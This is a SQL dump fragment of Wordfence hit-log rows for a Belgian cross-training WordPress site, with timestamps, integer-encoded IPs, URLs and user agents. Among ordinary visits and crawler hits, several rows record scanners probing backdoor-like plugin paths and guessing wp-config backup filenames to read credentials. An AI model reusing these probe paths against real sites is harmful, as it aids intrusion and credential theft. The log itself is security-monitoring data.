(75311, 1497544609.785701, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75312, 1497544610.220426, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75313, 1497544610.714077, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75314, 1497548734.596000, 1123633613, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75315, 1497551180.864392, 2680892047, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '213.186.33.3', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'),
(75316, 1497551190.365031, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75317, 1497551191.005406, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75318, 1497551191.474502, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75319, 1497551191.914352, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75320, 1497551192.359823, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75321, 1497551192.807030, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75322, 1497551193.374974, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75323, 1497551193.886241, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75324, 1497551194.394398, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75325, 1497551194.911783, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75326, 1497551195.424259, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75327, 1497552929.901312, 1123633421, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75328, 1497552931.453523, 1123633540, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75329, 1497560347.080911, 1538615370, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'android-app://com.google.android.googlequicksearchbox/https/www.google.com', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75330, 1497560348.466219, 1538615370, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75331, 1497561351.177212, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75332, 1497561377.169982, 1467349730, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/paypal-donation-button/paypal-donation-button.php', 'http://crosstrainingcenter.be/wp-content/plugins/paypal-donation-button/paypal-donation-button.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75333, 1497563552.032076, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75334, 1497565704.653961, 1426773780, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/network/etc.php', 'http://crosstrainingcenter.be/wp-admin/network/etc.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75335, 1497566255.214847, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75336, 1497567355.394323, 3024883483, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75337, 1497569723.131102, 1815808070, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(75338, 1497569726.125464, 1815808070, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(75339, 1497569728.041447, 1815808070, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(75340, 1497571731.723492, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75341, 1497573544.498907, 1123633540, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75342, 1497574151.374330, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75343, 1497576891.470406, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75344, 1497578761.751214, 1123633540, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75345, 1497581790.769487, 3107604753, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp_module-1/wp_msg.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp_module-1/wp_msg.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75346, 1497581999.950341, 757167658, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db-update.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db-update.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75347, 1497582174.092396, 88944456, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/customizer.php', 'http://crosstrainingcenter.be/customizer.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75348, 1497587440.624571, 1844203978, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75349, 1497587441.461266, 1844203978, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75350, 1497587442.382672, 1844203978, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75351, 1497587443.020963, 1844203978, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75352, 1497587443.755775, 1844203978, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75353, 1497587581.305574, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75354, 1497589774.176630, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75355, 1497590294.305797, 1347353146, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/paypal-donation-button/db.php', 'http://crosstrainingcenter.be/wp-content/plugins/paypal-donation-button/db.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75356, 1497590333.031383, 1138992850, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db_info.class.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db_info.class.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75357, 1497590613.348641, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(75358, 1497591278.180063, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75359, 1497591954.765547, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75360, 1497592612.259594, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75361, 1497593240.903428, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75362, 1497593806.515603, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75363, 1497594473.733574, 1123633540, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75364, 1497594586.704815, 3254831113, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/ajax-requests.new.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/ajax-requests.new.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75365, 1497595080.205759, 1123633540, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75366, 1497598922.706765, 1474632318, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/user-info.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/user-info.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75367, 1497603434.908840, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db_model.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db_model.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75368, 1497604222.883956, 1370060441, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75369, 1497604223.756726, 1370060441, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75370, 1497604224.461509, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75371, 1497604226.580534, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75372, 1497604227.098039, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75373, 1497604227.769484, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75374, 1497604228.353285, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75375, 1497604228.823575, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75376, 1497604229.329704, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75377, 1497604229.949127, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75378, 1497604230.453938, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75379, 1497604512.699292, 1073352502, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(75380, 1497609315.786181, 2342691993, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/images/media/rss.php', 'http://crosstrainingcenter.be/wp-includes/images/media/rss.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75381, 1497612213.946300, 84519249, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/slide-menues.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/slide-menues.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75382, 1497615741.963427, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75383, 1497615742.451781, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75384, 1497616083.012804, 1123633540, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75385, 1497622421.133831, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75386, 1497622733.269793, 3475901900, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75387, 1497627883.758373, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75388, 1497627885.524825, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75389, 1497627885.632430, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(75390, 1497627886.158394, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(75391, 1497627887.782488, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75392, 1497627891.205327, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75393, 1497628938.269326, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75394, 1497628939.057810, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75395, 1497628939.553805, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75396, 1497628939.978262, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75397, 1497628940.455990, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75398, 1497628941.014768, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75399, 1497628941.568499, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75400, 1497628942.099512, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75401, 1497628942.606791, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75402, 1497628943.115292, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75403, 1497628943.637133, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75404, 1497630584.362559, 876568582, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/sidebar-widescreen.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/sidebar-widescreen.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75405, 1497631117.183101, 3000613671, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-config.php~', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75406, 1497631119.909980, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config-backup1.txt', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75407, 1497631131.923640, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config.bak', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75408, 1497631134.006139, 3000613671, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-config.phpOLD', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75409, 1497631141.915718, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config.txt', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75410, 1497631144.470734, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config.phpa', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75411, 1497631147.401497, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config.old', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75412, 1497631154.217176, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config.php.txt', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75413, 1497631178.110128, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config.', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75414, 1497631180.983729, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config-backup.txt', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75415, 1497631200.808006, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/config.bak', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75416, 1497631223.962009, 3000613671, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/config.php~', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75417, 1497632784.317266, 2637637594, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75418, 1497632784.962496, 2637637594, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75419, 1497633810.324925, 2637637527, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75420, 1497638426.325473, 599388095, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0'),
(75421, 1497639841.409786, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75422, 1497639970.407651, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75423, 1497642987.696083, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentythirteen/system.php', 'http://crosstrainingcenter.be/wp-content/themes/twentythirteen/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
